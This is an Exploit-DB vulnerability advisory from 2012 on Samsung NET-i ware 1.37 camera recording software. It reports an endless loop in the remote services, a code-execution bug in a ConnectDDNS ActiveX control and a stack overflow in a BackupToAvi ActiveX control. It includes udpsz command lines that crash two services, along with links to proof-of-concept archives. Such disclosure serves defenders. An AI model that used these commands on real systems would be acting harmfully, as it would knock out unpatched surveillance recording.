Samsung NET-i ware 1.37 - Multiple Vulnerabilities

EDB-ID:

18765

CVE:

2012-4335 2012-4334 2012-4333 2012-4330 2012-4329

EDB Verified:

Author:

Luigi Auriemma

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2012-04-22

Vulnerable App: 
#######################################################################

                             Luigi Auriemma

Application:  Samsung NET-i ware
              http://www.samsungsecurity.com/product/product_view.asp?idx=6447
              http://www.samsungsecurity.com/product/product_view.asp?idx=5828
Versions:     <= 1.37
Platforms:    Windows
Bugs:         A] Endless loop in remote services
              B] Code execution in ConnectDDNS ActiveX
              C] Stack overflow in BackupToAvi ActiveX
Exploitation: remote
Date:         21 Apr 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


"Recording software for Samsung network cameras".


#######################################################################

=======
2) Bugs
=======


----------------------------------
A] Endless loop in remote services
----------------------------------

All the NET-i ware services are affected by an endless loop caused by
the wrong handling of negative 32bit size fields.


----------------------------------------
B] Code execution in ConnectDDNS ActiveX
----------------------------------------

Code execution vulnerability in the ConnectDDNS method used by the
following ActiveX components:
- EEDBA32E-5C2D-48f1-A58E-0AAB0BC230E3
- 17A7F731-C9EC-461C-B813-2F42A1BB58EB

  10022F80   8B02             MOV EAX,DWORD PTR DS:[EDX]
  10022F82   8B4D E8          MOV ECX,DWORD PTR SS:[EBP-18]
  10022F85   FF10             CALL DWORD PTR DS:[EAX]

The bug is not much reliable to replicate so I report it just for
reference.
No additional research performed.


----------------------------------------
C] Stack overflow in BackupToAvi ActiveX
----------------------------------------

Stack overflow in the BackupToAvi method used by the ActiveX components
3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A and
208650B1-3CA1-4406-926D-45F2DBB9C299.


#######################################################################

===========
3) The Code
===========


A]
http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip

  NiwMasterService:
  udpsz -b 0x80 -T SERVER 4505 0x28

  NiwStorageService:
  udpsz -T -c "REM" 0 -C 80808080 0x10 SERVER 4508 0x14

B,C]
http://aluigi.org/poc/netiware_1b.zip


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services